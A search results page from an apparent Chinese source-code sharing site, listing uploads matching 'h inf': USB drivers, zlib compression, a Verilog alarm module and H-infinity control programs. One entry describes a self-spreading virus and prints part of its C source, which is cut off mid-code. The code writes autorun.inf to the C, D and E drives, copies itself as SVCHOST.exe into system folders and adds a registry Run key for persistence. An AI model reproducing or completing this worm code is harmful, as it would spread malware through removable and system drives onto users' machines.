Location:
Search - h inf
Search list
Description: 用DriverStudio 3.2的DriverWizard向导制作的PDIUSBD12读写驱动程序(控制器使用飞思卡尔单片机MC9S12DT128B),并附带测试的应用程序,实现了读写In和Out功能以及厂商请求功能Vendor Request,工程内附带Inf文件和DriverStudio工程xml配置文件,可以自行修改,希望能帮到大家,共同进步-DriverStudio 3.2 using the Wizard DriverWizard produced PDIUSBD12 driver to read and write (single-chip controller to use Freescale MC9S12DT128B), and attached to the test application, achieved a reading and writing In and Out functions, as well as the request features vendors Vendor Request, projects Inf attached documents and DriverStudio works xml configuration file, you can make its own decisions, I hope to help everyone make progress together
Platform: |
Size: 3875840 |
Author: 林克 |
Hits:
Description: USB芯片FT245BM的驱动程序,FTDI公司的-USB chip FT245BM drivers, FTDI
Platform: |
Size: 665600 |
Author: 施立立 |
Hits:
Description: 用于Windows操作系统的通用USB 其中涉及到CyUSB.sys,CyAPI.h,CyAPI.lib的功能及用法。-Windows operating system for general-purpose USB involving CyUSB.sys, CyAPI.h, CyAPI.lib function and usage.
Platform: |
Size: 5120 |
Author: abc |
Hits:
Description: error test source code building in VC.including *.h,*.cpp and inf file.-error test source code building in VC.including*.h,*.cpp and inf file.
Platform: |
Size: 6144 |
Author: 黄阿莉 |
Hits:
Description: error test example2 source code building in VC.including *.h,*.cpp and inf file.-error test example2 source code building in VC.including*.h,*.cpp and inf file.
Platform: |
Size: 6144 |
Author: 黄阿莉 |
Hits:
Description: 文件夹的压缩和解压缩功能测试程序
由于要用程序压缩一个文件夹,因此选用zlib库。
在zlib中的例子程序zpipe.c中,给出了如何压缩一个文件,这里稍加扩展,对一个文件夹进行压缩。
说来也简单,就是将文件夹/目录下的每个文件找到并压缩到一个文件中。
-Decompress from file source to file dest until stream ends or EOF.
inf() returns Z_OK on success, Z_MEM_ERROR if memory could not be
allocated for processing, Z_DATA_ERROR if the deflate data is
invalid or incomplete, Z_VERSION_ERROR if the version of zlib.h and
the version of the library linked do not match, or Z_ERRNO if there
is an error reading or writing the files
本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/spacetiller/archive/2007/11/05/1867931.aspx
Platform: |
Size: 4433920 |
Author: hehe |
Hits:
Description: module naoshi(NAOSHI,CP1KHZ,H,M,S0)
output NAOSHI
input CP1KHZ
input [7:0]H
input [7:0]M
input S0
reg NAOSHI
always@(H or M or S0)
begin
if((H==07)&&(M==00)&&(S0==1))
NAOSHI<=CP1KHZ
else
NAOSHI<=0
end
endmodule
-module naoshi(NAOSHI,CP1KHZ,H,M,S0)
output NAOSHI
input CP1KHZ
input [7:0]H
input [7:0]M
input S0
reg NAOSHI
always@(H or M or S0)
begin
if((H==07)&&(M==00)&&(S0==1))
NAOSHI<=CP1KHZ
else
NAOSHI<=0
end
endmodule
Platform: |
Size: 742400 |
Author: tan |
Hits:
Description: attrib -s -h -r copy.exe
del copy.exe /F
attrib -s -h -r !.inf
del autorun.inf /F
e:-attrib-s-h-r copy.exe
del copy.exe /F
attrib-s-h-r !.inf
del autorun.inf /F
e:
Platform: |
Size: 21504 |
Author: aaddaaaa |
Hits:
Description: 1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件
2.在C、D、E盘中生成自动运行文件
3.注册c:\windows\system\svchost.exe,使其开机自动运行
4.在C:\windows\system下生成隐蔽DLL文件
5.病毒在执行后具有相联复制能力
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体:
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\msmouse.dll
c:\windows\system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在
本病毒到目前为止任何杀毒软件都无法将其查杀
本病毒单机默认使用对机器无害(破坏代码已屏蔽)
提供病毒卸载程序(保存为X.BAT,双击运行即可卸载):
函数:制造垃圾文件
1.可以用于病毒开机自启动的注册表位置:-/* SVCHOST.C */
/* SVCHOST.EXE*/
#define SVCHOST_NUM 6
#include<stdio.h>
#include<string.h>
char*autorun={"[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"}
char*files_autorun[10]={"c:\\autorun.inf","d:\\autorun.inf","e:\\autorun.inf"}
char*files_svchost[SVCHOST_NUM+1]={"c:\\windows\\system\\MSMOUSE.DLL",
"c:\\windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe",
"c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"}
char*regadd="reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f"
int copy(char*infile,char*outfile)
{
FILE*input,*output
char temp
if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen
(outfile,"wb"))!=NULL))
{
while(!feof(input))
{
fread(&temp,1,1,input)
fwrite(&temp,1,1
Platform: |
Size: 7168 |
Author: 2626648 |
Hits:
Description: simulate in matlab.
H inf. Loop Shaping Robust Control vs. Classical PI(D) Control:
A case study on the Longitudinal Dynamics of Hezarfen UAV.
PI(D) Control System Design.
Platform: |
Size: 480256 |
Author: hasan |
Hits:
Description: LPC 的一个USB驱动源码-The device descriptor is defined as a USB_DEVICE_DESCRIPTOR type.
This type is defined in usb_ch9.h Each entry into this structure
needs to be the correct length for the data type of the entry.
Platform: |
Size: 51200 |
Author: pegxb |
Hits:
Description: 基于Matlab H inf 鲁棒控制的设计
简述了 鲁棒控制器的基本思想,给出了运用Matlab鲁棒控制工具箱为假定空间桁架设计 鲁棒控制器的设计过程,同时也给出了控制器作用下闭环系统的分析结果-Robust control based on Matlab H inf robust controller design outlines the basic idea, given the use of Matlab robust control toolbox to assume that space truss design robust controller design process, but also gives the controller closed-loop system under analysis
Platform: |
Size: 3072 |
Author: tanhaonan |
Hits:
Description: msp430与PDIUSBD12的固件程序
D12驱动\win2k_xp\D12test.inf
D12驱动\win98\D12TEST.SYS
usb上位机测试程序\usb430d12\EasyD12.dll
usb上位机测试程序\usb430d12\EasyD12.H
-msp430 the PDIUSBD12 firmware
D12 driver \ win2k_xp \ D12test.inf
D12 driver \ win98 \ D12TEST.SYS
usb host computer test program \ usb430d12 \ EasyD12.dll,
usb host computer test program \ usb430d12 \ EasyD12.H,
Platform: |
Size: 757760 |
Author: 王峰 |
Hits:
Description: 用H-inf方法求某型飞机的控制器,标注比较清楚,对初学者很有帮助-design a controller using H-inf
Platform: |
Size: 1024 |
Author: lshljh |
Hits:
Description: function H = histogram(X, B)
序列的直方图统计
X : 输入序列
B : 直方图统计区间的中间值,按从小到大排列。
H : 直方图统计结果
注:第一个统计区间的左边界是-inf,最后一个统计区间的右边界是inf。
扩展1:采用2种或以上方法实现该函数,在算法思路、内存使用、速度上应有明显不同。
扩展2:对输入的二维矩阵进行缩放。
-function H = histogram (X, B)
Sequence histogram
X: input sequence
B: the median interval histogram statistics, from small to large order.
H: histogram statistics
Note: The first one is the left margin of statistical interval-inf, the last one is the right border of statistical interval inf.
Extension 1: Using 2 or more methods to achieve this function, the algorithm is thinking, memory usage, speed should be significantly different.
Extension 2: two-dimensional matrix of the input scaling.
Platform: |
Size: 2048 |
Author: 李三 |
Hits:
Description: 一个 markov jump system仿真程序-h2 and h-inf control of markov jump system
Platform: |
Size: 35840 |
Author: daijiangtao |
Hits:
Description: H—inf 滤波的算法步骤,实现H—inf 滤波程序,对初学者有帮助(H infinity filter calculation process)
Platform: |
Size: 27648 |
Author: ocean112
|
Hits:
Description: solve a problem with LMI for H inf and H 2 and one for both of them
Platform: |
Size: 1024 |
Author: miladbaniasadi
|
Hits: